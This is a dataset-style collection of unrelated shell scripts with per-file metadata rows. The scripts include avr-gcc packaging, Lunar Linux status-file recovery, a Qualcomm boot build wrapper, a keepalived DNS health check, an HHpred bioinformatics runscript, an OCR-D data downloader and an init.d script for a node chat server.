    ${MAKE} tooldir=/usr DESTDIR=${INSTALLDIR} install
    #cleanup
    rm -f ${INSTALLDIR}/usr/lib/libiberty.a
    rm -f ${INSTALLDIR}/usr/lib64/libiberty.a
    rm -rf ${INSTALLDIR}/usr/share/info
    rm -rf ${INSTALLDIR}/usr/share/man/man7
    #strip executables
    cd ${INSTALLDIR}/usr/bin/
    strip *
    cd ${INSTALLDIR}/usr/lib/gcc/avr/${SOURCEVERSION}/
    for binary in cc1 cc1plus collect2 lto-wrapper lto1 "install-tools/fixincl"
    do
        strip $binary
    done
}
# Thin wrappers binding this component's metadata to the shared packaging
# helpers from functions-build.sh.
package_deb(){
    package_deb_from ${INSTALLDIR} ${SOURCEVERSION}-${PACKAGE_RELEASE} gcc.control
}
package_rpm(){
    package_rpm_from ${INSTALLDIR} ${SOURCEVERSION} ${PACKAGE_RELEASE} ${PREFIX} gcc.spec
}
# remove() also comes from functions-build.sh.
cleanbuild(){
    remove ${SOURCEDIRNAME}
    remove ${GMPDIRNAME}
    remove ${MPCDIRNAME}
    remove ${MPFRDIRNAME}
}
cleandownloaded(){
    remove ${SOURCEFILENAME} ${GMPFILENAME} ${MPCFILENAME} ${MPFRFILENAME}
}
cleaninstall(){
    remove ${BUILDDIR}
    remove ${INSTALLDIR}
}
# main dispatch: select the action from the first CLI argument
BUILD_ROOT=$(pwd)
case $1 in
download)
download
;;
clean)
cleanbuild
;;
veryclean)
cleanbuild
cd ${BUILD_ROOT}
cleandownloaded
;;
deb)
# full pipeline: fetch, build, install into staging dir, package as .deb;
# the cd's between steps undo directory changes the steps leave behind
setup_package_target ${SOURCENAME}-avr-tinyos-beta ${SOURCEVERSION} ${PACKAGE_RELEASE}
cd ${BUILD_ROOT}
download
cd ${BUILD_ROOT}
unpack
cd ${BUILD_ROOT}
build
cd ${BUILD_ROOT}
installto
cd ${BUILD_ROOT}
package_deb
cd ${BUILD_ROOT}
cleaninstall
;;
rpm)
# as 'deb' but packaged as .rpm under a different package name
setup_package_target avr-${SOURCENAME}-tinyos ${SOURCEVERSION} ${PACKAGE_RELEASE}
cd ${BUILD_ROOT}
download
cd ${BUILD_ROOT}
unpack
cd ${BUILD_ROOT}
build
cd ${BUILD_ROOT}
installto
cd ${BUILD_ROOT}
package_rpm
cd ${BUILD_ROOT}
cleaninstall
;;
local)
# build and install locally without producing a distribution package
setup_local_target
cd ${BUILD_ROOT}
download
cd ${BUILD_ROOT}
unpack
cd ${BUILD_ROOT}
build
cd ${BUILD_ROOT}
installto
;;
*)
echo -e "\n./build.sh <target>"
echo -e " local | rpm | deb | clean | veryclean | download"
esac
| true
|
1148e014d035ae93c6b055a58c1a7fe6274174f1
|
Shell
|
lunar-linux/lunar
|
/libs/recovery.lunar
|
UTF-8
| 5,125
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# #
# This code is written for Lunar Linux, see #
# http://lunar-linux.org #
# #
############################################################
# #
# $FUNCTIONS/recovery #
# includes rebuild_status_files, replace_status_file, #
# check_status_files #
# 20020528 #
# #
############################################################
# #
# Copyrighted Kagan Kongar 2002 under GPLv2 #
# #
############################################################
# function : rebuild_status_files
# usage    : rebuild_status_files
# purpose  : rebuild the accidentally deleted status files by walking the
#            per-module install logs (oldest first) and re-deriving
#            name/version/size/date for each installed module.
# NOTE(review): iterates over unquoted `ls -rt` output, so module log names
# with whitespace would break — presumably log names never contain spaces.
rebuild_status_files() {
  debug_msg "rebuild_status_files ($@)"

  # refuse to proceed without explicit user confirmation
  if ! query \
    "Do you want to re-construct the status files from install logs?" y; then
    message "${PROBLEM_COLOR}Unable to continue without status files" \
            "${DEFAULT_COLOR}"
    exit 1
  fi

  if ! [ -d "$INSTALL_LOGS" ]; then
    message "${PROBLEM_COLOR}Unable to continue without install logs " \
            "${DEFAULT_COLOR}"
    exit 1
  fi

  message "${MESSAGE_COLOR}Re-creating status files." \
          "${DEFAULT_COLOR}"

  LOG_FILES=$(ls -rt $INSTALL_LOGS)
  for MODULE_NAME in $LOG_FILES; do
    # log names look like <module>-<version>; the module part may itself
    # contain dashes, so probe progressively shorter dash-separated prefixes
    # (up to 3 fields) until find_section recognises one as a module name
    COUNTS=3
    REAL_NAME=$MODULE_NAME
    unset SECTION
    while [ "$COUNTS" -gt "0" ]; do
      REAL_NAME=$(echo $REAL_NAME | cut -d "-" -f -"$COUNTS")
      SECTION=$(find_section $REAL_NAME)
      if [ -n "$SECTION" ]; then
        # everything after the matched prefix is the version string
        ((COUNTS++))
        VERSION=$(echo $MODULE_NAME | cut -d "-" -f "$COUNTS"-)
        SIZE=$(find_module_size $REAL_NAME $VERSION)
        DATE=$(ls -l $INSTALL_LOGS/$REAL_NAME-$VERSION --time-style=+%Y%m%d | awk '{print $6}')
        # adjusted add_module code that echos the DATE field ;^)
        # rewrite the status file under locks: drop any stale entry for this
        # module, then append the reconstructed record
        lock_file $MODULE_STATUS &&
        lock_file $MODULE_STATUS_BACKUP &&
        {
          OLD_STATE=$(get_module_state $REAL_NAME "installed")
          grep -v "^$REAL_NAME:" "$MODULE_STATUS" > $MODULE_STATUS_BACKUP
          if [ -n "$OLD_STATE" ]; then
            OLD_STATE="+$OLD_STATE"
          fi
          echo "$REAL_NAME:$DATE:installed$OLD_STATE:$VERSION:$SIZE" >> $MODULE_STATUS_BACKUP &&
          cp $MODULE_STATUS_BACKUP $MODULE_STATUS
        }
        unlock_file $MODULE_STATUS_BACKUP &&
        unlock_file $MODULE_STATUS &&
        message "Added: $REAL_NAME-$VERSION ($SIZE) ($DATE)"
        break
      fi
      ((COUNTS--))
    done
  done
  message "${MESSAGE_COLOR}Success!!${DEFAULT_COLOR}\n"
}

# function : replace_status_file
# usage    : replace_status_file
# purpose  : restore MODULE_STATUS from MODULE_STATUS_BACKUP (after asking),
#            falling back to rebuild_status_files when no backup exists.
# NOTE(review): `if \`cp ...\`` executes cp via command substitution — it
# works (the status of the substitution is used) but a plain `if cp ...`
# would be the conventional form.
replace_status_file() {
  debug_msg "replace_status_file ($@)"
  # no backup at all: reconstruct from install logs instead
  if ! [ -f "$MODULE_STATUS_BACKUP" ]; then rebuild_status_files; return; fi
  message "${PROBLEM_COLOR}Unable to find MODULE_STATUS file" \
          "${MODULE_COLOR}$MODULE_STATUS" \
          "${DEFAULT_COLOR}"
  if query "Do you want to use the backup?" y; then
    if ! [ -f "$MODULE_STATUS_BACKUP" ]; then rebuild_status_files; fi
    if `cp $MODULE_STATUS_BACKUP $MODULE_STATUS`; then
      message "${MESSAGE_COLOR}Success!!" \
              "${DEFAULT_COLOR}"
    else
      message "${PROBLEM_COLOR}Unsuccessful :=( No more operation!!" \
              "${DEFAULT_COLOR}"
      exit 1
    fi
  else
    message "${PROBLEM_COLOR}Unable to continue without that :=("\
            "No more operation!!" \
            "${DEFAULT_COLOR}"
    exit 1
  fi
}

# function : check_status_files
# usage    : check_status_files
# purpose  : ensure both MODULE_STATUS and MODULE_STATUS_BACKUP exist,
#            restoring or recreating whichever is missing.
check_status_files() {
  debug_msg "check_status_files ($@)"
  if ! [ -f "$MODULE_STATUS" ]; then replace_status_file; fi
  if ! [ -f "$MODULE_STATUS" ]; then echo "Unknown error!!!"; exit; fi
  if ! [ -f "$MODULE_STATUS_BACKUP" ]; then
    message "${PROBLEM_COLOR}Unable to find MODULE_STATUS_BACKUP file" \
            "${MODULE_COLOR}$MODULE_STATUS_BACKUP" \
            "${DEFAULT_COLOR}"
    if `cp $MODULE_STATUS $MODULE_STATUS_BACKUP`; then
      message "${MESSAGE_COLOR}MODULE_STATUS is successfully copied" \
              "to MODULE_STATUS_BACKUP" \
              "${DEFAULT_COLOR}"
    else
      message "${PROBLEM_COLOR}Unsuccessful while copying" \
              "MODULE_STATUS to MODULE_STATUS_BACKUP :=( " \
              "No more operation!!" \
              "${DEFAULT_COLOR}"
      exit 1
    fi
  fi
}
| true
|
bca5be7729c23a0053c47328549545f382a2fe7f
|
Shell
|
EchoQian/PhoebeM
|
/boot_images/build/ms/build_all.sh
|
UTF-8
| 2,536
| 2.890625
| 3
|
[] |
no_license
|
#===============================================================================
#
# CBSP Buils system
#
# General Description
# build shell script file.
#
# Copyright (c) 2013,2014 by QUALCOMM, Incorporated.
# All Rights Reserved.
# QUALCOMM Proprietary/GTDR
#
#-------------------------------------------------------------------------------
#
# $Header: //components/rel/boot.bf/3.0.c8/boot_images/build/ms/build_all.sh#1 $
# $DateTime: 2015/03/19 01:58:37 $
# $Author: pwbldsvc $
# $Change: 7697609 $
# EDIT HISTORY FOR FILE
#
# This section contains comments describing changes made to the module.
# Notice that changes are listed in reverse chronological order.
#
# when who what, where, why
# -------- --- -----------------------------------------------------------
# 11/07/14 sk Added for 8929 build command
# 04/01/14 lm Added for 8936 build command
# 03/07/14 jz Added for 9x45 build command
# 10/07/13 ck Removed targets that are not in Bear family
# 09/12/13 ck Adding 8916
# 07/23/13 plc Adding 8994
# 06/26/13 plc Adding 8092 compilation
# 05/13/12 sy Adding 9x35 compiilation
# 05/06/13 plc Adding 8x62 compilation
# 04/23/12 sy Adding 8084 and 8974 compilation
# 04/04/12 sy Remove 8x10,8x26 compilation
# 04/16/12 dh Enable 8084
# 09/18/12 sy Enable 8x10 ,8x26 compilation
# 07/20/12 sy Initial Draft
#===============================================================================
#!/bin/bash
# Build every supported target family in sequence, aborting on the first
# failure so later builds do not mask the error.

#---- Set up default paths -----------
export BUILD_ROOT=../..
export CORE_BSP_ROOT=$BUILD_ROOT/core/bsp
export TOOLS_SCONS_ROOT=$BUILD_ROOT/tools/build/scons
export PARTITION_TOOLS_ROOT=$BUILD_ROOT/core/storage/tools/nandbootmbn

#-------- set the build dir and reset the command line parameter ----
build_dir=$(dirname "$0")
cd "$build_dir"

# if setenv.sh exists, run it
if [ -f "$BUILD_ROOT/build/ms/setenv.sh" ]; then
    source setenv.sh
else
    echo "Warning: SetEnv file not existed"
fi

# One build per target family; the four copy-pasted stanzas of the original
# collapsed into a loop. "$@" is quoted so caller arguments with spaces
# survive intact.
for family in 8916 9x45 8936 8929; do
    sh build.sh TARGET_FAMILY=$family "$@"
    if [[ $? != 0 ]]; then
        echo -e "Build_All: Fail to compile ${family}. Exiting ....."
        exit 1
    fi
done
| true
|
c449e4df5b8178781025c9b83b953830e4f48a79
|
Shell
|
CoinXu/libuv-example
|
/docker.sh
|
UTF-8
| 189
| 2.515625
| 3
|
[] |
no_license
|
# Launch an interactive libuv dev container with the workspace mounted,
# then clean the container up once the interactive session ends.
name=libuv
WORKSPACE_DIRECTORY=~/github/libuv-example

docker run \
    --name "${name}" -it \
    -v "${WORKSPACE_DIRECTORY}:/opt/libuv" \
    libuv:1.0 bash

# BUG FIX: the original line was `echo docker stop ${name} && docker rm ...`,
# which only *printed* the stop command and then tried to remove a container
# that had never been stopped. Stop first, then remove.
docker stop "${name}" && docker rm "${name}"
| true
|
09714bcbf3e07eeda9cba8cdcbee5afdc15d7ac2
|
Shell
|
xiangjunyu/xiangjunyu
|
/LVS+DNS/check_dns.sh
|
GB18030
| 794
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
#Creat By xiangjunyu
#version 20170621-1.0
# Keepalived MISC health check for real servers behind an LVS/DNS setup.
# NOTE(review): $port and $rip are not set in this script — they are
# presumably injected by the calling keepalived real-server context; confirm.
# (Original comments were GB18030-encoded and arrived garbled; rewritten in
# English from the code.)
if [ $port == 53 ];then
# For the DNS port a bare port probe is not enough: actually resolve a known
# record against the real server and grep for the expected answer, so the
# exit status reflects whether DNS service is really working.
nslookup checkdns.test.com ${rip}|grep mail.test.com
else
# For any other port, probe TCP connectivity with nc (-z: zero-I/O scan).
nc -z $rip ${port}
fi
if [ $? -eq 0 ]; then
# exit 0 tells keepalived the real server is healthy (keep it in the pool)
exit 0
else
# non-zero tells keepalived to take the real server out of the pool
exit 1
fi
| true
|
962ede4055716db7cd7699c6b614a73ebf216e44
|
Shell
|
proteinevolution/Toolkit
|
/tel/runscripts/hhpred.sh
|
UTF-8
| 15,814
| 3.71875
| 4
|
[
"Apache-2.0"
] |
permissive
|
SEQ_COUNT=$(egrep '^>' ../params/alignment | wc -l)
CHAR_COUNT=$(wc -m < ../params/alignment)
A3M_INPUT=$(head -1 ../params/alignment | egrep "^#A3M#" | wc -l)
DBJOINED=""
LOW_ALN_DEPTH=""
#create file in which selected dbs are written
touch ../params/dbs
if [[ ! -f "../params/alignment_two" ]] ; then
#splitting input databases into array and completing with -d
if [[ "%hhsuitedb.content" != "" ]]
then
DBS=$(echo "%hhsuitedb.content" | tr " " "\n")
DBJOINED+=`printf -- '-d %HHSUITE/%s ' ${DBS[@]}`
#write selected databses into file
printf "${DBS[@]}" >> ../params/dbs
printf "\n" >> ../params/dbs
fi
if [[ "%proteomes.content" != "" ]]
then
PROTEOMES=$(echo "%proteomes.content" | tr " " "\n")
DBJOINED+=`printf -- '-d %HHSUITE/%s ' ${PROTEOMES[@]}`
#write selected databses into file
printf "${PROTEOMES[@]}" >> ../params/dbs
fi
DBARRAY=( ${DBJOINED} )
DBCOUNT=${#DBARRAY[@]}
if [[ ${DBCOUNT} -gt "8" ]] ; then
echo "#Only 4 databases may be selected at a time!" >> ../results/process.log
false
fi
fi
if [[ ${CHAR_COUNT} -gt "10000000" ]] ; then
echo "#Input may not contain more than 10000000 characters." >> ../results/process.log
false
fi
if [[ ${A3M_INPUT} = "1" ]] ; then
sed -i '1d' ../params/alignment
reformatValidator.pl a3m fas \
$(readlink -f ../params/alignment) \
$(readlink -f ../params/alignment.tmp) \
-d 160 -uc -l 32000
if [[ ! -f ../params/alignment.tmp ]]; then
echo "#Input is not in valid A3M format." >> ../results/process.log
false
else
echo "#Query is in A3M format." >> ../results/process.log
mv ../params/alignment.tmp ../params/alignment
echo "done" >> ../results/process.log
fi
fi
if [[ ${SEQ_COUNT} = "0" ]] && [[ ${FORMAT} = "0" ]] ; then
sed 's/[^a-z^A-Z]//g' ../params/alignment > ../params/alignment1
CHAR_COUNT=$(wc -m < ../params/alignment1)
if [[ ${CHAR_COUNT} -gt "10000" ]] ; then
echo "#Single protein sequence inputs may not contain more than 10000 characters." >> ../results/process.log
false
else
sed -i "1 i\>Q_${JOBID}" ../params/alignment1
mv ../params/alignment1 ../params/alignment
fi
fi
if [[ ${FORMAT} = "1" ]] ; then
reformatValidator.pl clu fas \
$(readlink -f %alignment.path) \
$(readlink -f ../results/${JOBID}.fas) \
-d 160 -uc -l 32000 -rh 1
else
reformatValidator.pl fas fas \
$(readlink -f %alignment.path) \
$(readlink -f ../results/${JOBID}.fas) \
-d 160 -uc -l 32000 -rh 1
fi
if [[ ! -f ../results/${JOBID}.fas ]] ; then
echo "#Input is not in aligned FASTA/CLUSTAL format." >> ../results/process.log
false
fi
SEQ_COUNT=$(egrep '^>' ../results/${JOBID}.fas | wc -l)
if [[ ${SEQ_COUNT} -gt "10000" ]] ; then
echo "#Input contains more than 10000 sequences." >> ../results/process.log
false
fi
if [[ ${SEQ_COUNT} -gt "1" ]] ; then
echo "#Query is an MSA with ${SEQ_COUNT} sequences." >> ../results/process.log
else
echo "#Query is a single protein sequence." >> ../results/process.log
fi
echo "done" >> ../results/process.log
if [[ -f ../params/alignment_two ]] ; then
echo "#Pairwise comparison mode." >> ../results/process.log
echo "done" >> ../results/process.log
#remove empty lines
sed -i '/^\s*$/d' ../params/alignment_two
SEQ_COUNT2=$(egrep '^>' ../params/alignment_two | wc -l)
CHAR_COUNT2=$(wc -m < ../params/alignment_two)
FORMAT2=$(head -1 ../params/alignment_two | egrep "^CLUSTAL" | wc -l)
A3M_INPUT2=$(head -1 ../params/alignment_two | egrep "^#A3M#" | wc -l)
if [[ ${CHAR_COUNT2} -gt "10000000" ]] ; then
echo "#Template sequence/MSA may not contain more than 10000000 characters." >> ../results/process.log
false
fi
if [[ ${A3M_INPUT2} = "1" ]] ; then
sed -i '1d' ../params/alignment_two
reformatValidator.pl a3m fas \
$(readlink -f ../params/alignment_two) \
$(readlink -f ../params/alignment_two.tmp) \
-d 160 -uc -l 32000
if [[ ! -f ../params/alignment_two.tmp ]]; then
echo "#Template is not in valid A3M format." >> ../results/process.log
false
else
echo "#Template is in A3M format." >> ../results/process.log
mv ../params/alignment_two.tmp ../params/alignment_two
echo "done" >> ../results/process.log
fi
fi
if [[ ${SEQ_COUNT2} = "0" ]] && [[ ${FORMAT2} = "0" ]] ; then
sed 's/[^a-z^A-Z]//g' ../params/alignment_two > ../params/alignment2
CHAR_COUNT2=$(wc -m < ../params/alignment2)
if [[ ${CHAR_COUNT2} -gt "10000" ]] ; then
echo "#Template protein sequence contains more than 10000 characters." >> ../results/process.log
false
else
sed -i "1 i\>T_${JOBID}" ../params/alignment2
mv ../params/alignment2 ../params/alignment_two
fi
fi
if [[ ${FORMAT2} = "1" ]] ; then
reformatValidator.pl clu fas \
$(readlink -f %alignment_two.path) \
$(readlink -f ../results/${JOBID}.2.fas) \
-d 160 -uc -l 32000 -rh 1
else
#remove empty lines
sed -i '/^\s*$/d' ../params/alignment_two
reformatValidator.pl fas fas \
$(readlink -f %alignment_two.path) \
$(readlink -f ../results/${JOBID}.2.fas) \
-d 160 -uc -l 32000 -rh 1
fi
if [[ ! -f ../results/${JOBID}.2.fas ]] ; then
echo "#Template MSA is not in aligned FASTA/CLUSTAL format." >> ../results/process.log
false
fi
SEQ_COUNT2=$(egrep '^>' ../results/${JOBID}.2.fas | wc -l)
if [[ ${SEQ_COUNT2} -gt "10000" ]] ; then
echo "#Template MSA contains more than 10000 sequences." >> ../results/process.log
false
fi
if [[ ${SEQ_COUNT2} -gt "1" ]] ; then
echo "#Template is an MSA with ${SEQ_COUNT} sequences." >> ../results/process.log
else
echo "#Template is a single protein sequence." >> ../results/process.log
fi
mv ../results/${JOBID}.2.fas ../params/alignment_two
echo "done" >> ../results/process.log
fi
head -n 2 ../results/${JOBID}.fas > ../results/firstSeq0.fas
sed 's/[\.\-]//g' ../results/firstSeq0.fas > ../results/firstSeq.fas
echo "#Predicting sequence features." >> ../results/process.log
TMPRED=`tmhmm ../results/firstSeq.fas -short`
run_Coils -c -min_P 0.8 < ../results/firstSeq.fas >& ../results/firstSeq.cc
COILPRED=$(egrep ' 0 in coil' ../results/firstSeq.cc | wc -l)
# Run SignalP; since the source organism is unknown, check all four cases
${BIOPROGS}/tools/signalp/bin/signalp -org 'euk' -format 'short' -fasta ../results/firstSeq.fas -prefix "../results/${JOBID}_euk" -tmp '../results/'
${BIOPROGS}/tools/signalp/bin/signalp -org 'gram+' -format 'short' -fasta ../results/firstSeq.fas -prefix "../results/${JOBID}_gramp" -tmp '../results/'
${BIOPROGS}/tools/signalp/bin/signalp -org 'gram-' -format 'short' -fasta ../results/firstSeq.fas -prefix "../results/${JOBID}_gramn" -tmp '../results/'
${BIOPROGS}/tools/signalp/bin/signalp -org 'arch' -format 'short' -fasta ../results/firstSeq.fas -prefix "../results/${JOBID}_arch" -tmp '../results/'
rm ../results/firstSeq0.fas ../results/firstSeq.cc
echo "done" >> ../results/process.log
ITERS=%msa_gen_max_iter.content
#CHECK IF MSA generation is required or not
if [[ ${ITERS} = "0" ]] ; then
echo "#No MSA generation required for building A3M." >> ../results/process.log
reformat_hhsuite.pl fas a3m ../results/${JOBID}.fas ${JOBID}.a3m -M first
mv ${JOBID}.a3m ../results/${JOBID}.a3m
echo "done" >> ../results/process.log
else
#MSA generation required
#Check what method to use (PSI-BLAST? HHblits?)
echo "#Query MSA generation required." >> ../results/process.log
echo "done" >> ../results/process.log
#MSA generation by PSI-BLAST
if [[ "%msa_gen_method.content" = "psiblast" ]] ; then
echo "#Running ${ITERS} iteration(s) of PSI-BLAST for query MSA generation." >> ../results/process.log
#Check if input is a single sequence or an MSA
INPUT="query"
if [[ ${SEQ_COUNT} -gt 1 ]] ; then
INPUT="in_msa"
fi
psiblast -db ${STANDARD}/nr70 \
-num_iterations ${ITERS} \
-evalue %hhpred_incl_eval.content \
-inclusion_ethresh 0.001 \
-num_threads %THREADS \
-num_descriptions 20000 \
-num_alignments 20000 \
-${INPUT} ../results/${JOBID}.fas \
-out ../results/output_psiblastp.html
#keep results only of the last iteration
shorten_psiblast_output.pl ../results/output_psiblastp.html ../results/output_psiblastp.html
#extract MSA in a3m format
alignhits_html.pl ../results/output_psiblastp.html ../results/${JOBID}.a3m \
-Q ../results/${JOBID}.fas \
-e %hhpred_incl_eval.content \
-cov %min_cov.content \
-a3m \
-no_link \
-blastplus
echo "done" >> ../results/process.log
else
#MSA generation by HHblits
echo "#Running ${ITERS} iteration(s) of HHblits against %msa_gen_method.content for query MSA generation." >> ../results/process.log
reformat_hhsuite.pl fas a3m \
$(readlink -f ../results/${JOBID}.fas) \
$(readlink -f ../results/${JOBID}.in.a3m)
hhblits -cpu %THREADS \
-v 2 \
-e %hhpred_incl_eval.content \
-i ../results/${JOBID}.in.a3m \
-d %UNIREF \
-oa3m ../results/${JOBID}.a3m \
-n ${ITERS} \
-qid %min_seqid_query.content \
-cov %min_cov.content \
-mact 0.35
rm ../results/${JOBID}.in.a3m
echo "done" >> ../results/process.log
fi
fi
echo "#Generating query A3M." >> ../results/process.log
QA3M_COUNT=$(egrep '^>' ../results/${JOBID}.a3m | wc -l)
#Generate representative MSA for forwarding
hhfilter -i ../results/${JOBID}.a3m \
-o ../results/reduced.a3m \
-diff 200
sed -i "1 i\#A3M#" ../results/reduced.a3m
reformat_hhsuite.pl a3m a3m \
$(readlink -f ../results/${JOBID}.a3m) \
$(readlink -f ../results/tmp0) \
-d 160 -l 32000
head -n 400 ../results/tmp0 > ../results/tmp1
reformat_hhsuite.pl a3m fas \
$(readlink -f ../results/tmp1) \
$(readlink -f ../results/reduced.fas) \
-d 160 -l 32000 -uc
rm ../results/tmp0 ../results/tmp1
# Here assume that the query alignment exists
# prepare histograms
# Reformat query into fasta format ('full' alignment, i.e. 100 maximally diverse sequences, to limit amount of data to transfer)
mv ../results/${JOBID}.a3m ../results/full.a3m
addss.pl ../results/full.a3m
echo "done" >> ../results/process.log
# creating alignment of query and subject input
if [[ -f ../params/alignment_two ]]
then
cd ../results
if [[ ${ITERS} = "0" ]] && [[ ${SEQ_COUNT2} -gt "1" ]] ; then
echo "#No MSA generation required for building template A3M." >> ../results/process.log
reformat_hhsuite.pl fas a3m %alignment_two.path db.a3m -M first
else
echo "#Running 3 iterations of HHblits for template MSA and A3M generation." >> ../results/process.log
reformat_hhsuite.pl fas a3m \
$(readlink -f %alignment_two.path) \
$(readlink -f ../results/${JOBID}.in2.a3m)
hhblits -d %UNIREF -i ../results/${JOBID}.in2.a3m -oa3m db.a3m -n 3 -cpu %THREADS -v 2
rm ../results/${JOBID}.in2.a3m
fi
addss.pl db.a3m
ffindex_build -as db_a3m.ff{data,index} db.a3m
hhmake -i db.a3m -o db.hhm
ffindex_build -as db_hhm.ff{data,index} db.hhm
cstranslate -A ${HHLIB}/data/cs219.lib -D ${HHLIB}/data/context_data.lib -x 0.3 -c 4 -f -i db_a3m -o db_cs219 -I a3m -b
ffindex_build -as db_cs219.ff{data,index}
DBJOINED+="-d ../results/db"
cd ../0
echo "done" >> ../results/process.log
fi
if [[ -f ../params/alignment_two ]] ; then
echo "#Comparing query profile HMM with template profile HMM." >> ../results/process.log
else
echo "#Searching profile HMM database(s)." >> ../results/process.log
fi
if [[ "%alignmacmode.content" = "loc" ]] ; then
MACT="-norealign"
ALIGNMODE="-loc"
fi
if [[ "%alignmacmode.content" = "locrealign" ]] ; then
MACT_SCORE=%macthreshold.content
MACT="-realign -mact ${MACT_SCORE}"
ALIGNMODE="-loc"
fi
if [[ "%alignmacmode.content" = "glob" ]] ; then
MACT="-realign -mact 0.0"
ALIGNMODE="-glob"
fi
# Perform HHsearch #
hhsearch -cpu %THREADS \
-i ../results/full.a3m \
${DBJOINED} \
-o ../results/${JOBID}.hhr \
-oa3m ../results/${JOBID}.a3m \
-p %pmin.content \
-Z %desc.content \
${ALIGNMODE} \
-z 1 \
-b 1 \
-B %desc.content \
-ssm %ss_scoring.content \
-sc 1 \
-seq 1 \
-dbstrlen 10000 \
${MACT} \
-maxres 32000 \
-contxt ${HHLIB}/data/context_data.crf
echo "done" >> ../results/process.log
echo "#Preparing output." >> ../results/process.log
#create full alignment json; use for forwarding
fasta2json.py ../results/reduced.fas ../results/reduced.json
hhviz.pl ${JOBID} ../results/ ../results/ &> /dev/null
#Generate query template alignment
hhmakemodel.pl -i ../results/${JOBID}.hhr -fas ../results/alignment.fas -p %pmin.content
# Generate Query in JSON
fasta2json.py ../results/alignment.fas ../results/querytemplate.json
# Generate Hitlist in JSON for hhrfile
hhr2json.py "$(readlink -f ../results/${JOBID}.hhr)" > ../results/results.json
# Create a JSON with probability values of the hits
extract_from_json.py -tool hhpred ../results/results.json ../results/plot_data.json
# Generate Query in JSON
fasta2json.py ../results/firstSeq.fas ../results/query.json
# add DB to json
manipulate_json.py -k 'db' -v '%hhsuitedb.content' ../results/results.json
# add Proteomes to json
manipulate_json.py -k 'proteomes' -v '%proteomes.content' ../results/results.json
# add transmembrane prediction info to json
manipulate_json.py -k 'tmpred' -v "${TMPRED}" ../results/results.json
# add coiled coil prediction info to json
manipulate_json.py -k 'coilpred' -v "${COILPRED}" ../results/results.json
# Write results of signal peptide prediction
SIGNALP=$(grep 'SP(Sec/SPI)' ../results/*.signalp5 | wc -l)
if [[ ${SIGNALP} -gt "4" ]]; then
manipulate_json.py -k 'signal' -v "1" ../results/results.json
else
manipulate_json.py -k 'signal' -v "0" ../results/results.json
fi
rm ../results/*.signalp5
# For alerting user if too few homologs are found for building A3M
if [[ ${ITERS} = "0" ]] ; then
manipulate_json.py -k 'msa_gen' -v "custom" ../results/results.json
else
manipulate_json.py -k 'msa_gen' -v "%msa_gen_method.content" ../results/results.json
fi
# Number of sequences in the query A3M
manipulate_json.py -k 'qa3m_count' -v ${QA3M_COUNT} ../results/results.json
echo "done" >> ../results/process.log
| true
|
dc38c5aff477f71cdf7c6d41c968be5a857510ba
|
Shell
|
ASVLeipzig/cor-asv-ann-data-processing
|
/ground-truth.sh
|
UTF-8
| 328
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
# Fetch the OCR-D ground-truth ZIP archives listed in IndexGT.html into
# ./ground-truth, skipping files already present, then clone the assets repo.
mkdir -p ground-truth
# Fix: abort if we cannot enter the target directory instead of downloading
# into whatever the current directory happens to be.
cd ground-truth || exit 1
rm -f IndexGT.html
wget http://www.ocr-d.de/sites/all/GTDaten/IndexGT.html
# Pull every quoted *.zip href out of the index page; names are plain
# filenames without spaces, so the unquoted expansion in 'for' is safe here.
for file in $(grep -o '"[^"]*[.]zip"' IndexGT.html | tr -d '"')
do
    test -f "$file" || wget "http://www.ocr-d.de/sites/all/GTDaten/$file"
done
test -d assets || git clone https://github.com/OCR-D/assets
| true
|
b0be56e4cf64ebc997f973674fbfb31400ce3e25
|
Shell
|
shpp-abelokon/chat
|
/mychat_v.01
|
UTF-8
| 1,754
| 3.59375
| 4
|
[] |
no_license
|
#! /bin/sh
### BEGIN INIT INFO
# Provides: skeleton
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Example initscript
# Description: This file should be used to construct scripts to be
# placed in /etc/init.d.
### END INIT INFO
# Author:
#
# Please remove the "Author" lines above and replace them
# with your own name if you copy and modify this script.
# Do NOT "set -e"
# PATH should only include /usr/* if it runs after the mountnfs.sh script
PATH=/sbin:/usr/sbin:/bin:/usr/bin
# Service identity and defaults used by the start/stop/status/restart
# functions below.
DESC="mychat on socket.io"
NAME=mychat
# NOTE(review): DAEMON, DAEMON_ARGS and SCRIPTNAME are not referenced by any
# function in this script — confirm whether they can be removed.
DAEMON=/usr/sbin/$NAME
DAEMON_ARGS="--options args"
PIDFILE=/var/run/$NAME.pid
SCRIPTNAME=/etc/init.d/$NAME
# Where the node app lives and how to launch it under 'forever'.
SOURCE_DIR=/opt/chat
COMMAND=node
SOURCE_NAME=server.js
# Unprivileged account the app runs as.
USER=vagrant
LOG_FILE=/log/$NAME.log
forever=forever
start() {
  # Pre-create the log and pid files and hand ownership to the service user
  # so 'forever' (running as $USER) can write them.
  touch "$LOG_FILE" "$PIDFILE"
  chown "$USER" "$LOG_FILE" "$PIDFILE"
  # Launch the app under forever as the unprivileged user; quote every
  # expansion (the original left them unquoted, SC2086).
  sudo -H -u "$USER" "$forever" start --pidFile "$PIDFILE" -l "$LOG_FILE" -a --sourceDir "$SOURCE_DIR" -c "$COMMAND" "$SOURCE_NAME"
  RETVAL=$?
}
restart() {
  echo -n "Restarting $NAME node instance : "
  # Fix: abort (with a failure status in RETVAL) if the source directory is
  # missing, instead of restarting from whatever directory we are in.
  cd "$SOURCE_DIR" || { RETVAL=1; return 1; }
  sudo -H -u "$USER" "$forever" restart "$SOURCE_NAME"
  RETVAL=$?
}
# Show the forever process table for the service user and record the exit
# status in RETVAL for the trailing 'exit $RETVAL'.
status() {
echo "Status for $NAME:"
sudo -H -u $USER $forever list
RETVAL=$?
}
stop() {
  echo -n "Shutting down $NAME node instance : "
  cd "$SOURCE_DIR" || { RETVAL=1; return 1; }
  sudo -H -u "$USER" "$forever" stop "$SOURCE_NAME"
  # Fix: the original never assigned RETVAL here, so the script's trailing
  # 'exit $RETVAL' reported a stale/empty status after 'stop'.
  RETVAL=$?
}
case "$1" in
start)
start
;;
stop)
stop
;;
status)
status
;;
restart)
restart
;;
*)
echo "Usage: {start|stop|status|restart}"
exit 1
;;
esac
exit $RETVAL
| true
|
e49402daa1e66bfadf5dbd5e56517565234b01c1
|
Shell
|
realtingley/legacy
|
/newSetup.sh
|
UTF-8
| 7,052
| 3.453125
| 3
|
[] |
no_license
|
